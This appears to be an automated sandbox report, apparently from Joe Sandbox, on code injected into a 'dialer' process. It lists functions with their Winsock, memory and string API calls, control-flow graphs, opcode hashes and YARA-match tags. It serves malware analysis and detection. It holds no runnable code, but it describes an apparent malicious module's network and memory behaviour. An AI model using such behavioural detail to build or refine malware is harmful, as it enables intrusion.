                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003), ref: 053C8AB2
                                                                                • WSAStartup.WS2_32(00000202,?), ref: 053CAEA0
                                                                                  • Part of subcall function 053CAC49: memset.MSVCRT ref: 053CAC59
                                                                                  • Part of subcall function 053CAC49: htons.WS2_32(00000002), ref: 053CAC6A
                                                                                  • Part of subcall function 053CAC49: inet_addr.WS2_32(?), ref: 053CAC77
                                                                                  • Part of subcall function 053CAC90: memset.MSVCRT ref: 053CACA0
                                                                                  • Part of subcall function 053CAC90: htons.WS2_32(?), ref: 053CACB1
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 053CAEED
                                                                                • getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 053CAF1E
                                                                                • closesocket.WS2_32(00000000), ref: 053CAF31
                                                                                • WSAGetLastError.WS2_32 ref: 053CAF39
                                                                                • socket.WS2_32(00000017,00000001,00000000), ref: 053CAF4E
                                                                                • closesocket.WS2_32(00000000), ref: 053CAF83
                                                                                • WSAGetLastError.WS2_32 ref: 053CAF8B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Error$Lastclosesockethtonsmemsetsocket$ModeStartupgetsockoptinet_addr
                                                                                • String ID:
                                                                                • API String ID: 2777411211-0
                                                                                • Opcode ID: cbc47303c0605d0d6a6715a5445afa7e4901c412492404f1d45f525003499cb1
                                                                                • Instruction ID: 36955af3948e86117088412caefd041f4248eb92e03ff6c240e085e1cd14fd51
                                                                                • Opcode Fuzzy Hash: cbc47303c0605d0d6a6715a5445afa7e4901c412492404f1d45f525003499cb1
                                                                                • Instruction Fuzzy Hash: 3531B6B2104308ABD221AAA4DC8EFAF7FEDEB45720F40055EF6159E1C0DBB59D048771
                                                                                Function 053CA387 Relevance: 10.7, APIs: 7, Instructions: 157networkregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 53 53ca387-53ca3c6 memset * 2 54 53ca3de-53ca3f9 WSASend 53->54 55 53ca3c8-53ca3db CreateEventA 53->55 56 53ca44a-53ca455 GetLastError 54->56 57 53ca3fb-53ca3ff 54->57 55->54 58 53ca470-53ca477 56->58 60 53ca457-53ca46b WSAGetLastError call 53cac0f 56->60 57->58 59 53ca401-53ca415 57->59 61 53ca479 58->61 62 53ca484-53ca498 58->62 63 53ca42d-53ca445 59->63 64 53ca417-53ca41c 59->64 72 53ca517-53ca51b 60->72 66 53ca47c-53ca482 61->66 67 53ca49a-53ca49f 62->67 68 53ca4b0-53ca4d0 62->68 70 53ca50e-53ca514 call 53c9e85 63->70 64->63 69 53ca41e-53ca425 64->69 66->62 66->66 67->68 74 53ca4a1-53ca4a8 67->74 75 53ca515 68->75 76 53ca4d2-53ca4eb RegisterWaitForSingleObject 68->76 69->63 77 53ca427-53ca42a 69->77 70->75 74->68 79 53ca4aa-53ca4ad 74->79 75->72 76->75 80 53ca4ed-53ca4f7 76->80 77->63 79->68 82 53ca4fd-53ca504 80->82 83 53ca4f9-53ca4fb 80->83 86 53ca509-53ca50d 82->86 83->86 86->70
                                                                                APIs
                                                                                • memset.MSVCRT ref: 053CA3AE
                                                                                • memset.MSVCRT ref: 053CA3BA
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,053C427C,00000000,00000000,053C4237,00000000), ref: 053CA3CC
                                                                                • WSASend.WS2_32(?,053C427C,?,00000000,00000000,00000010,00000000), ref: 053CA3F1
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 053CA44A
                                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 053CA457
                                                                                • RegisterWaitForSingleObject.KERNEL32(00000048,?,053CA51C,00000000,000000FF,0000000C), ref: 053CA4E3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastmemset$CreateEventObjectRegisterSendSingleWait
                                                                                • String ID:
                                                                                • API String ID: 2712206520-0
                                                                                • Opcode ID: c2ce5f1b2eb79f2d705be60092d6c82a8da1265e7f59462a02ae71a32e957419
                                                                                • Instruction ID: 909bbeef18a678ebeeac3c63f0dc165377064bf9ebfa0ee8e882efc3282ae229
                                                                                • Opcode Fuzzy Hash: c2ce5f1b2eb79f2d705be60092d6c82a8da1265e7f59462a02ae71a32e957419
                                                                                • Instruction Fuzzy Hash: 2F5161B1500A0AAFD725CF24D884A66BFF8FF04318B1486ADE556CBA90D770FD55CB90
                                                                                Function 053C9B02 Relevance: 7.6, APIs: 5, Instructions: 94networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 107 53c9b02-53c9b26 ioctlsocket 108 53c9b3e-53c9b58 CreateIoCompletionPort 107->108 109 53c9b28 WSAGetLastError 107->109 110 53c9b5a-53c9b5e 108->110 111 53c9b63-53c9b6d 108->111 112 53c9b2e-53c9b2f 109->112 114 53c9b96-53c9b9e GetLastError 110->114 115 53c9b60 110->115 116 53c9b6f 111->116 117 53c9b75-53c9b7c 111->117 113 53c9b32-53c9b39 call 53cac0f 112->113 125 53c9be2-53c9be5 113->125 114->113 115->111 116->117 119 53c9b7e-53c9b81 117->119 120 53c9bb4-53c9bb8 117->120 119->120 124 53c9b83-53c9b85 119->124 122 53c9bca-53c9bce 120->122 123 53c9bba-53c9bc8 call 53c9bfb 120->123 127 53c9be7-53c9bee 122->127 128 53c9bd0-53c9be0 call 53c9c32 122->128 123->122 123->125 124->120 129 53c9b87-53c9b8e SetFileCompletionNotificationModes 124->129 134 53c9bf6-53c9bfa 125->134 135 53c9bf4 127->135 136 53c9bf0 127->136 128->125 128->127 132 53c9ba0-53c9bab 129->132 133 53c9b90-53c9b94 129->133 132->120 139 53c9bad-53c9baf 132->139 133->120 135->134 136->135 139->112
                                                                                APIs
                                                                                • ioctlsocket.WS2_32(053CAD04,8004667E,053CAD81), ref: 053C9B1D
                                                                                • WSAGetLastError.WS2_32(?,?,053C9AC7,17E80870,053CAD04,00000000,00000010,00000000,?,?,?,053C9A53,053CAD04,00000002,053CAD04,00000010), ref: 053C9B28
                                                                                • CreateIoCompletionPort.KERNELBASE(053CAD04,19751710,053CAD04,00000000,?,?,053C9AC7,17E80870,053CAD04,00000000,00000010,00000000,?,?,?,053C9A53), ref: 053C9B48
                                                                                • SetFileCompletionNotificationModes.KERNEL32(053CAD04,00000003,?,?,053C9AC7,17E80870,053CAD04,00000000,00000010,00000000,?,?,?,053C9A53,053CAD04), ref: 053C9B8A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Completion$CreateErrorFileLastModesNotificationPortioctlsocket
                                                                                • String ID:
                                                                                • API String ID: 3397353003-0
                                                                                • Opcode ID: 701afc64ad88f211157609c352ffd7358be5cf3ab9c978f5bf613ede4803a136
                                                                                • Instruction ID: 83494024980e5505231a4ee9a6e8aca60876a22e9acecf62ab2b61914eb3c8bc
                                                                                • Opcode Fuzzy Hash: 701afc64ad88f211157609c352ffd7358be5cf3ab9c978f5bf613ede4803a136
                                                                                • Instruction Fuzzy Hash: 48319132104605FADB259E65DC89B6A7FAEFF40394F16419CF9029A1C1EBB0FE44C760
                                                                                Function 053CA0C0 Relevance: 4.6, APIs: 3, Instructions: 136COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 141 53ca0c0-53ca0d6 142 53ca0d8-53ca0dc 141->142 143 53ca0e1-53ca0e4 141->143 144 53ca1d5-53ca1db call 53cac0f 142->144 145 53ca105-53ca112 143->145 146 53ca0e6-53ca0f5 call 53cacdd 143->146 155 53ca1dc-53ca1df 144->155 149 53ca12d-53ca163 memset 145->149 150 53ca114-53ca121 call 53cae30 145->150 152 53ca0fa-53ca0ff 146->152 156 53ca16c-53ca16e 149->156 150->149 157 53ca123-53ca128 150->157 152->145 152->155 158 53ca21e-53ca222 155->158 159 53ca1be-53ca1c9 GetLastError 156->159 160 53ca170-53ca178 156->160 161 53ca1d2 157->161 163 53ca1e1-53ca1ef 159->163 164 53ca1cb-53ca1d1 WSAGetLastError 159->164 162 53ca17a-53ca188 160->162 160->163 161->144 167 53ca19d-53ca1bc call 53c9e85 162->167 168 53ca18a-53ca18c 162->168 165 53ca207-53ca21a 163->165 166 53ca1f1-53ca1f6 163->166 164->161 171 53ca21c 165->171 166->165 169 53ca1f8-53ca1ff 166->169 167->171 168->167 170 53ca18e-53ca195 168->170 169->165 173 53ca201-53ca204 169->173 170->167 174 53ca197-53ca19a 170->174 171->158 173->165 174->167
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1e204d0350d3838c0d58df5621c46f9a26c748daecd2407ec9021cbbcd190d7b
                                                                                • Instruction ID: b33db6930d620194d224bf833cfcfee15b9f464b3b5c250dc523940774705594
                                                                                • Opcode Fuzzy Hash: 1e204d0350d3838c0d58df5621c46f9a26c748daecd2407ec9021cbbcd190d7b
                                                                                • Instruction Fuzzy Hash: B4419FB15006099FDB15CF25C884BA2BBB9FF05364F4481ADED1A8F296DB71E941CBA0
                                                                                Function 053CAA5B Relevance: 4.6, APIs: 3, Instructions: 119COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 176 53caa5b-53caa71 177 53caa97-53caa9c 176->177 178 53caa73-53caa78 176->178 181 53caa9e-53caaa2 177->181 182 53caaef-53caaf5 177->182 179 53caa7a-53caa84 shutdown 178->179 180 53caa86-53caa8f call 53cab98 178->180 179->182 180->182 194 53caa91-53caa95 180->194 181->182 186 53caaa4-53caaad call 53cab98 181->186 184 53cab19-53cab1f 182->184 185 53caaf7-53cab00 182->185 189 53cab21-53cab2a 184->189 190 53cab43-53cab48 184->190 185->184 188 53cab02-53cab04 185->188 186->182 202 53caaaf-53caab7 186->202 188->184 195 53cab06-53cab08 188->195 189->190 196 53cab2c-53cab2e 189->196 192 53cab4a-53cab53 closesocket 190->192 193 53cab57-53cab63 190->193 192->193 198 53cab69-53cab6c 193->198 199 53cab65-53cab67 193->199 194->182 195->184 200 53cab0a-53cab11 195->200 196->190 201 53cab30-53cab32 196->201 203 53cab6f-53cab7d 198->203 199->198 199->203 200->184 204 53cab13-53cab16 200->204 201->190 205 53cab34-53cab3b 201->205 202->182 206 53caab9-53caabb 202->206 207 53cab7f-53cab84 203->207 208 53cab94-53cab97 203->208 204->184 205->190 209 53cab3d-53cab40 205->209 210 53caabd-53caac8 206->210 207->208 213 53cab86-53cab91 207->213 209->190 211 53caade-53caaeb 210->211 212 53caaca-53caad1 210->212 211->210 215 53caaed-53caaee 211->215 212->211 214 53caad3-53caada closesocket 212->214 213->208 214->211 215->182
                                                                                APIs
                                                                                • shutdown.WS2_32(D7FF5605,00000001), ref: 053CAA7E
                                                                                • closesocket.WS2_32(?), ref: 053CAAD4
                                                                                • closesocket.WS2_32(D7FF5605), ref: 053CAB4D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesocket$shutdown
                                                                                • String ID:
                                                                                • API String ID: 3079814495-0
                                                                                • Opcode ID: 85a9a1f9910051654db4f110c37b051823268d924ccb5e54f76233362fbb9508
                                                                                • Instruction ID: 5c01b06fe9c83e7fc02fa1e16cb6e5e18c6e4bbebab23d2993e7fe65645e1c4f
                                                                                • Opcode Fuzzy Hash: 85a9a1f9910051654db4f110c37b051823268d924ccb5e54f76233362fbb9508
                                                                                • Instruction Fuzzy Hash: 30416B74514B098FEB358E25C548B62BFF6FF05365F044A5DE8938AA90D7B0EC46CB40
                                                                                Function 053CA983 Relevance: 3.1, APIs: 2, Instructions: 86networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 216 53ca983-53ca98f 217 53ca9ab-53ca9c4 216->217 218 53ca991-53ca996 216->218 220 53caa1a-53caa30 call 53cafca call 53cac0f 217->220 221 53ca9c6-53ca9df setsockopt 217->221 218->217 219 53ca998-53ca99a 218->219 219->217 223 53ca99c-53ca9a3 219->223 236 53caa33-53caa3e 220->236 224 53ca9ff-53caa18 WSAGetLastError call 53cac0f 221->224 225 53ca9e1-53ca9fd call 53c9ecb 221->225 223->217 227 53ca9a5-53ca9a8 223->227 224->236 225->236 227->217 238 53caa56-53caa5a 236->238 239 53caa40-53caa42 236->239 239->238 240 53caa44-53caa46 239->240 240->238 241 53caa48-53caa53 240->241 241->238
                                                                                APIs
                                                                                • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 053CA9D7
                                                                                • WSAGetLastError.WS2_32(?,053C8D2F,00000000,00000000,?,00000000,00000000,00000000,053C8BB0,00000000,?,00000000,053C2CE1,?,00000000,?), ref: 053CA9FF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 1729277954-0
                                                                                • Opcode ID: e334875779404d21b8ef707236a5d5c52ab1e9c144bb91c1db6d3511edc388d9
                                                                                • Instruction ID: a626c0e5c9db665f613d297c056282b08d67dedce4600f0804d41c4f266f6f4c
                                                                                • Opcode Fuzzy Hash: e334875779404d21b8ef707236a5d5c52ab1e9c144bb91c1db6d3511edc388d9
                                                                                • Instruction Fuzzy Hash: 80314A74204609AFDB209F25C985A66BBB8FF09364B04865DFD5A9BB91C730FC118BA4
                                                                                Function 02CA00A0 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02CA00C9
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02CA0275
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000003.1761987159.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_3_2ca0000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                • Instruction ID: 0fb280b31d403f9723afbaa0aa3b0a804904dac779744841e765796feb3f49a6
                                                                                • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                • Instruction Fuzzy Hash: 54718871E0424A9FDB41CF98C991BEDBBF0EB09358F284195E565FB241C334AA91CF64
                                                                                Function 053CF03C Relevance: 2.6, APIs: 2, Instructions: 82stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 242 53cf03c-53cf043 243 53cf118-53cf119 242->243 244 53cf049-53cf065 242->244 245 53cf075-53cf07a 244->245 246 53cf067-53cf072 call 53d2762 244->246 248 53cf07c-53cf088 call 53d2762 free 245->248 249 53cf08b-53cf090 245->249 246->245 248->249 250 53cf09f-53cf0a3 249->250 251 53cf092-53cf09e call 53cef4e 249->251 256 53cf0cd-53cf0d2 250->256 257 53cf0a5-53cf0ca call 53cef8e call 53cef4e call 53cf002 250->257 251->250 259 53cf0d4-53cf0e0 call 53cf002 256->259 260 53cf0e1-53cf0e9 256->260 257->256 259->260 265 53cf108-53cf117 call 53d2762 260->265 266 53cf0eb-53cf105 strlen call 53d2762 260->266 265->243 266->265
                                                                                APIs
                                                                                • free.MSVCRT(74C08559,74C08559,0000414D,00000000,?,00000000,053C4237,053C4300,053C4237,00000000,053C429A,?,00000000,053C4237,00000000,053C4361), ref: 053CF086
                                                                                • strlen.MSVCRT ref: 053CF0EC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: freestrlen
                                                                                • String ID:
                                                                                • API String ID: 322734593-0
                                                                                • Opcode ID: be0c143f5b5f88fe6089367818da339655f9c98cf4b890c4bf222fc860ebc3b3
                                                                                • Instruction ID: f1ff8bea20cd113b7b5e2d32df989c8a6aec1bd288835c13d5b1575ae9e56d9d
                                                                                • Opcode Fuzzy Hash: be0c143f5b5f88fe6089367818da339655f9c98cf4b890c4bf222fc860ebc3b3
                                                                                • Instruction Fuzzy Hash: 06216F32308714ABDB717B39ED45E4BBBEAFF40B10B45486DF086A2560DA22FC109B20
                                                                                Function 053C46ED Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • malloc.MSVCRT ref: 053C46F4
                                                                                • memset.MSVCRT ref: 053C470A
                                                                                  • Part of subcall function 053CE798: memset.MSVCRT ref: 053CE7A3
                                                                                  • Part of subcall function 053CE7AC: calloc.MSVCRT(00000001,0000414D), ref: 053CE7CF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$callocmalloc
                                                                                • String ID:
                                                                                • API String ID: 4186080596-0
                                                                                • Opcode ID: feb0ba898aec5dc9806905e708b914c3ca356040276c6869a5524fbc4aea1a7e
                                                                                • Instruction ID: eab29633fd23e2e44aa31badd2f76fe039812920f8b7b8261738bd1bbc9e10b8
                                                                                • Opcode Fuzzy Hash: feb0ba898aec5dc9806905e708b914c3ca356040276c6869a5524fbc4aea1a7e
                                                                                • Instruction Fuzzy Hash: 8FF04F75740710ABD621AB64CD0EF4B7FE8EF85B10F05885CF559AB640C634AD00D750
                                                                                Function 053C9EF3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 293 53c9ef3-53c9f1e 294 53c9f20-53c9f23 293->294 295 53c9f33-53c9f3b 293->295 294->295 296 53c9f25-53c9f2e 294->296 297 53c9f3d-53c9f42 295->297 298 53c9f5f-53c9f63 295->298 296->295 299 53c9f30 296->299 300 53c9f44-53c9f47 297->300 301 53c9f56-53c9f58 call 53c9f64 297->301 299->295 300->301 302 53c9f49-53c9f53 CreateEventA 300->302 304 53c9f5d-53c9f5e 301->304 302->301 304->298
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,053C21B5,?,053C9762,?,053C21B5,053C21B5,053C4579,?,053C45AE,053C45FA,053C454F,?), ref: 053C9F4D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent
                                                                                • String ID:
                                                                                • API String ID: 2692171526-0
                                                                                • Opcode ID: 722b9dbe80ebcc21dc3bc3f3b6a31c3f9ce33f2f0c65448f105364798927de73
                                                                                • Instruction ID: c09851a8fdc39e0f0a1f61c69d01e7cf9a89efea408f6f16b3732fb290f9e698
                                                                                • Opcode Fuzzy Hash: 722b9dbe80ebcc21dc3bc3f3b6a31c3f9ce33f2f0c65448f105364798927de73
                                                                                • Instruction Fuzzy Hash: 6C010C769087019FE734CE26D444B67BBF9FB88721F05895DE88A86A40E7B4F845CB60
                                                                                Function 053CE7AC Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 305 53ce7ac-53ce7d8 calloc 306 53ce7ef-53ce7f6 305->306 307 53ce7da-53ce7ed 305->307 308 53ce80d-53ce85d 306->308 307->306 310 53ce7f8-53ce80b call 53cea13 call 53ce866 307->310 315 53ce861-53ce865 308->315 310->308 318 53ce85f 310->318 318->315
                                                                                APIs
                                                                                • calloc.MSVCRT(00000001,0000414D), ref: 053CE7CF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: calloc
                                                                                • String ID:
                                                                                • API String ID: 2635317215-0
                                                                                • Opcode ID: 8d8ffda9bb09da733926f1009e79d4af12582328e7ce8ca654cc6d03d98ae797
                                                                                • Instruction ID: 1d76f19b2b2f6e8cbef388c254ba1c4bd409a21634100d2299a2976cd63d65eb
                                                                                • Opcode Fuzzy Hash: 8d8ffda9bb09da733926f1009e79d4af12582328e7ce8ca654cc6d03d98ae797
                                                                                • Instruction Fuzzy Hash: 0721DB71504704DED721CF2AE881A86FBE8FF94754F20481FE199C76A1DBB0A4409F64
                                                                                Function 053C1BD9 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 319 53c1bd9-53c1be7 malloc 320 53c1be9-53c1bfd 319->320 321 53c1c00-53c1c05 319->321 320->321 322 53c1c09-53c1c16 call 53c1c20 321->322 323 53c1c07 321->323 325 53c1c1b-53c1c1f 322->325 323->322
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: malloc
                                                                                • String ID:
                                                                                • API String ID: 2803490479-0
                                                                                • Opcode ID: 11bfe7882586c3a10dcfbf7b4f59ad7390e580bf31e41bacd7c2e386165aabcb
                                                                                • Instruction ID: 546020a198f87edbbdcd7e58a26015755b428c57b8128d42105c178edf89b6b1
                                                                                • Opcode Fuzzy Hash: 11bfe7882586c3a10dcfbf7b4f59ad7390e580bf31e41bacd7c2e386165aabcb
                                                                                • Instruction Fuzzy Hash: 12F0FEB56042099FCF098F54E854DA97FA5FF48354B0580ADFD094B361D731D820DB50

                                                                                Non-executed Functions

                                                                                Function 02CA027F Relevance: .0, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000003.1761987159.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_3_2ca0000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                • Instruction ID: c49e79bfe1c8360b3732ce1deda0d0229e27b712915685f78aab3049b0aeab15
                                                                                • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                • Instruction Fuzzy Hash: 78F0C275A01301CFCB24CF0AC594EA577F5EBC0798B254295E404DB260D3B0DE84C750
                                                                                Function 053C4AB5 Relevance: 31.6, APIs: 25, Instructions: 300COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcmp.MSVCRT(?,053EDEBC,00000001,00000000,?,053C328A,?,?), ref: 053C4AE4
                                                                                • memcmp.MSVCRT(?,053EDEB8,00000002), ref: 053C4B13
                                                                                • memcmp.MSVCRT(?,053EDEB4,00000003), ref: 053C4B53
                                                                                • memcmp.MSVCRT(?,053EDEA0,00000004), ref: 053C4BE8
                                                                                • memcmp.MSVCRT(?,053EDE98,00000005), ref: 053C4C2C
                                                                                • memcmp.MSVCRT(?,053EDE70,00000006), ref: 053C4CEA
                                                                                • memcmp.MSVCRT(?,053EDE58,00000007), ref: 053C4D66
                                                                                • memcmp.MSVCRT(?,053EDE3C,00000008), ref: 053C4DE4
                                                                                • memcmp.MSVCRT(?,053EDE18,00000009), ref: 053C4E60
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID:
                                                                                • API String ID: 1475443563-0
                                                                                • Opcode ID: 643208356b6fddabf7d220adeaa1dcc424972ee7e980cf238e5dccd3b800bc60
                                                                                • Instruction ID: 0b8edb30f0f19afaedfa747c7aeb393f4fce4a8d8355d190a6cff1f755478326
                                                                                • Opcode Fuzzy Hash: 643208356b6fddabf7d220adeaa1dcc424972ee7e980cf238e5dccd3b800bc60
                                                                                • Instruction Fuzzy Hash: 0881D1B674C32076D92151696C5BF362ECE5B21A07F4448DCFC09AE5D2F7A1ED208783
                                                                                Function 053C9CA2 Relevance: 16.7, APIs: 11, Instructions: 168networkregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • socket.WS2_32(0000138A,00000001,00000000), ref: 053C9CCC
                                                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,053CA95A,?,00000000,?,00000000,00000000,?,00000000), ref: 053C9D09
                                                                                • closesocket.WS2_32(00000000), ref: 053C9D44
                                                                                • memset.MSVCRT ref: 053C9D5A
                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,?), ref: 053C9DBB
                                                                                • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 053C9DC8
                                                                                • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 053C9DD2
                                                                                • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 053C9DDA
                                                                                • closesocket.WS2_32(?), ref: 053C9DFE
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 053C9E0C
                                                                                • RegisterWaitForSingleObject.KERNEL32(00000154,?,053C9EAD,00000000,000000FF,00000004), ref: 053C9E49
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 053C1000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_53c1000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Handleclosesocket$CloseInformationObjectRegisterSingleWaitmemsetsocket
                                                                                • String ID:
                                                                                • API String ID: 1241441197-0
                                                                                • Opcode ID: c9994902a9705f439b66e34654958bf91bb7b950c502c54cead80e64eddf988f
                                                                                • Instruction ID: 17171446a219964c03e4f44537ea4b1145cabffa62884759a4ee26cf2e58ecdc
                                                                                • Opcode Fuzzy Hash: c9994902a9705f439b66e34654958bf91bb7b950c502c54cead80e64eddf988f
                                                                                • Instruction Fuzzy Hash: 80519833210A06EFD7219FB4CC49BAA7FB8FB45311F1142ADE4168A580DB74FD118B94
                                                                                Function 053C2E70 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 263stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserDefaultLangID.KERNEL32(00000059,00000000,00000020), ref: 053C2EEA
